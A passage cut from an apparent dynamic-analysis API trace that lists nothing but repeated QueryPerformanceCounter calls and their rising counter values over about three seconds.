lpPerformanceCount=0x6adfdfc*=3096813874511) returned 1 [0149.320] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096813889249) returned 1 [0149.336] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096815481891) returned 1 [0149.336] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096815498912) returned 1 [0149.352] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096817070484) returned 1 [0149.352] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096817084326) returned 1 [0149.368] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096818665358) returned 1 [0149.368] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096818678413) returned 1 [0149.384] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096820262920) returned 1 [0149.384] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096820276629) returned 1 [0149.400] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096821871119) returned 1 [0149.400] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096821884716) returned 1 [0149.416] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096823473442) returned 1 [0149.416] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096823498724) returned 1 [0149.432] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096825067087) returned 1 [0149.432] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096825082180) returned 1 [0149.448] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096826669616) returned 1 [0149.448] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096826683254) returned 1 [0149.511] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096832964360) returned 1 [0149.511] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096832980816) returned 1 [0149.511] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096833014409) returned 1 [0149.511] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096833031588) returned 1 [0149.512] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096833063057) returned 1 [0149.512] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096833074697) returned 1 [0149.528] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096834674270) returned 1 [0149.528] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096834701888) returned 1 [0149.544] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096836277307) returned 1 [0149.544] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096836304449) returned 1 [0149.560] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096837888996) returned 1 [0149.560] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096837927086) returned 1 [0149.576] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096839472197) returned 1 [0149.576] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096839496027) returned 1 [0149.592] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096841071752) returned 1 [0149.592] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096841089289) returned 1 [0149.608] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096842670307) returned 1 [0149.608] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096842685055) returned 1 [0149.626] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096844480392) returned 1 [0149.626] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096844499956) returned 1 [0149.640] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096845865152) returned 1 [0149.640] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096845879091) returned 1 [0149.656] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096847464179) returned 1 [0149.656] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096847478429) returned 1 [0149.672] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096849066065) returned 1 [0149.672] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096849081202) returned 1 [0149.688] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096850665530) returned 1 [0149.688] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096850680431) returned 1 [0149.704] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096852264401) returned 1 [0149.704] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096852279041) returned 1 [0149.720] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096853872822) returned 1 [0149.720] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096853894208) returned 1 [0149.736] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096855470369) returned 1 [0149.736] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096855487956) returned 1 [0149.752] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096857133145) returned 1 [0149.753] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096857165640) returned 1 [0149.768] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096858721586) returned 1 [0149.768] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096858741614) returned 1 [0149.785] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096860372996) returned 1 [0149.785] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096860407924) returned 1 [0149.801] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096861969754) returned 1 [0149.801] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096861986917) returned 1 [0149.817] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096863571017) returned 1 [0149.817] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096863589527) returned 1 [0149.833] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096865169313) returned 1 [0149.833] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096865186434) returned 1 [0149.849] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096866769690) returned 1 [0149.849] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096866788283) returned 1 [0149.865] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096868369057) returned 1 [0149.865] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096868386296) returned 1 [0149.881] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096869981890) returned 1 [0149.881] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096870006778) returned 1 [0149.897] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096871577114) returned 1 [0149.897] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096871602716) returned 1 [0149.913] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096873174112) returned 1 [0149.913] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096873199064) returned 1 [0149.929] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096874774112) returned 1 [0149.929] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096874795797) returned 1 [0149.945] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096876386017) returned 1 [0149.945] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096876418239) returned 1 [0149.963] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096878164988) returned 1 [0149.963] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096878185764) returned 1 [0149.978] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096879733080) returned 1 [0149.979] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096879758002) returned 1 [0149.994] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096881319967) returned 1 [0149.994] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096881337672) returned 1 [0150.010] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096882921328) returned 1 [0150.010] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096882939317) returned 1 [0150.026] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096884515360) returned 1 [0150.026] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096884530635) returned 1 [0150.049] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096887967060) returned 1 [0150.061] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096887995171) returned 1 [0150.061] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096888046794) returned 1 [0150.062] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096888062793) returned 1 [0150.074] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096889320779) returned 1 [0150.074] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096889340576) returned 1 [0150.090] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096890916612) returned 1 [0150.090] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096890933344) returned 1 [0150.106] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096892519831) returned 1 [0150.106] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096892536870) returned 1 [0150.122] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096894120658) returned 1 [0150.122] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096894136930) returned 1 [0150.138] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096895724178) returned 1 [0150.138] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096895747225) returned 1 [0150.154] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096897317495) returned 1 [0150.154] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096897335846) returned 1 [0150.170] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096898920618) returned 1 [0150.170] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096898936754) returned 1 [0150.188] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096900676185) returned 1 [0150.188] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096900698329) returned 1 [0150.202] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096902125166) returned 1 [0150.203] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096902161249) returned 1 [0150.218] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096903723584) returned 1 [0150.218] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096903745776) returned 1 [0150.234] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096905298900) returned 1 [0150.234] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096905316549) returned 1 [0150.250] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096906899451) returned 1 [0150.250] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096906917216) returned 1 [0150.266] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096908493343) returned 1 [0150.266] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096908506984) returned 1 [0150.282] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096910096767) returned 1 [0150.282] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096910114442) returned 1 [0150.298] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096911695981) returned 1 [0150.298] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096911714143) returned 1 [0150.325] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096914415422) returned 1 [0150.325] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096914435792) returned 1 [0150.341] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096915994380) returned 1 [0150.341] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096916010071) returned 1 [0150.357] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096917597133) returned 1 [0150.357] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096917611372) returned 1 [0150.373] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096919192073) returned 1 [0150.373] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096919206200) returned 1 [0150.389] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096920798504) returned 1 [0150.389] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096920813174) returned 1 [0150.410] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096922862728) returned 1 [0150.410] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096922879745) returned 1 [0151.998] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097081728615) returned 1 [0151.998] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097081745969) returned 1 [0152.105] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097092401784) returned 1 [0152.105] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097092429086) returned 1 [0152.106] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097092468349) returned 1 [0152.106] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097092483058) returned 1 [0152.120] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097093896580) returned 1 [0152.120] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097093933701) returned 1 [0152.136] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097095487011) returned 1 [0152.136] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097095503978) returned 1 [0152.153] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097097252049) returned 1 [0152.154] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097097355198) returned 1 [0152.169] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097098793374) returned 1 [0152.169] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097098828854) returned 1 [0152.185] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097100384735) returned 1 [0152.185] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097100399205) returned 1 [0152.201] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097101965821) returned 1 [0152.201] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097101980394) returned 1 [0152.217] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097103584689) returned 1 [0152.217] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097103612185) returned 1 [0152.233] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097105173463) returned 1 [0152.233] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097105191691) returned 1 [0152.249] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097106769958) returned 1 [0152.249] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097106786934) returned 1 [0152.265] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097108368995) returned 1 [0152.265] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097108386451) returned 1 [0152.281] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097109965747) returned 1 [0152.281] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097109979953) returned 1 [0152.298] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097111669008) returned 1 [0152.298] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097111684891) returned 1 [0152.313] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097113179668) returned 1 [0152.313] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097113202566) returned 1 [0152.329] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097114772327) returned 1 [0152.329] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097114795864) returned 1 [0152.345] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097116374406) returned 1 [0152.345] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097116403763) returned 1 [0152.361] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097117970879) returned 1 [0152.361] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097117988494) returned 1 [0152.377] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097119573905) returned 1 [0152.377] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097119598490) returned 1 [0152.393] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097121178550) returned 1 [0152.393] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097121200983) returned 1 [0152.409] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097122777347) returned 1 [0152.409] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097122799390) returned 1 [0152.425] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097124406279) returned 1 [0152.425] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097124422871) returned 1 [0152.441] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097125972132) returned 1 [0152.441] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097125994968) returned 1 [0152.456] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097127552865) returned 1 [0152.457] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097127577252) returned 1 [0152.472] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097129153629) returned 1 [0152.473] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097129177576) returned 1 [0152.488] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097130753573) returned 1 [0152.489] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097130779388) returned 1 [0152.504] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097132316590) returned 1 [0152.504] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097132446938) returned 1 [0152.520] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097133920245) returned 1 [0152.520] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097133936863) returned 1 [0152.536] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097135511149) returned 1 [0152.536] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097135524817) returned 1 [0152.552] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097137110303) returned 1 [0152.552] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097137124655) returned 1 [0152.568] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097138713680) returned 1 [0152.568] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097138727938) returned 1 [0152.584] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097140305250) returned 1 [0152.584] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097140318632) returned 1 [0152.607] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097142557688) returned 1 [0152.607] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097142609963) returned 1 [0152.621] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097143989974) returned 1 [0152.621] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097144006825) returned 1 [0152.637] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097145636104) returned 1 [0152.637] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097145653644) returned 1 [0152.653] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097147194946) returned 1 [0152.653] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097147210936) returned 1 [0152.669] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: 